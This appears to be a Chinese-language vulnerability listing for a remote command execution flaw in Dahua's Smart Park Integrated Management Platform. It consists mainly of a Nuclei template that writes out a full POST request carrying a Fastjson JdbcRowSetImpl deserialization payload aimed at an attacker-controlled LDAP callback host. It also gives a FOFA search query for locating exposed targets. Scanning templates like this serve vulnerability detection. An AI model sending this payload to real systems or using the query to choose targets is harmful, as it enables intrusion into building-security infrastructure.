dahua-wpms-rce: Dahua Smart Park Integrated Management Platform - Remote Command Execution

日期: 2025-08-01 | 影响软件: Dahua Smart Park Integrated Management Platform | POC: 已公开

漏洞描述

Dahua Smart Park Integrated Management Platform is vulnerable to RCE.

PoC代码[已公开]

id: dahua-wpms-rce

info:
  name: Dahua Smart Park Integrated Management Platform - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: Dahua Smart Park Integrated Management Platform is vulnerable to RCE.
  reference:
    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/dahua-zhyq-deleteftp-rce.py
  metadata:
    max-request: 1
    fofa-query: body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
  tags: rce,dahua,wpms,vuln

http:
  - raw:
      - |
        POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "autoCommit"
          - "set property error"
        condition: and

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4a0a00473045022100d66570a1c61d21102a6a86398f5bc4a627dd550b8f3f62004b85c022e8fcc5e702207206fdf9b3d8b3befe4b2f9a9242d041d9be6b484d470453e3f9b89ae1431b4f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐